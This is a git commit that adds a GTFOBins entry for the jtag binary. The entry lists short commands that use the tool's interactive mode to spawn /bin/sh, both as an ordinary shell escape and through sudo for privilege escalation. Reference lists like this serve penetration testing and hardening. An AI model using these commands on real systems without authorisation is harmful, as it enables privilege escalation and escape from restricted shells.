master
Miguel R 2022-07-13 10:25:55 +02:00 committed by GitHub
parent a91775b84a
commit e9306c73da
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 0 deletions

11
_gtfobins/jtag.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
shell:
- code: |
jtag --interactive
shell /bin/sh
sudo:
- code: |
sudo jtag --interactive
shell /bin/sh
---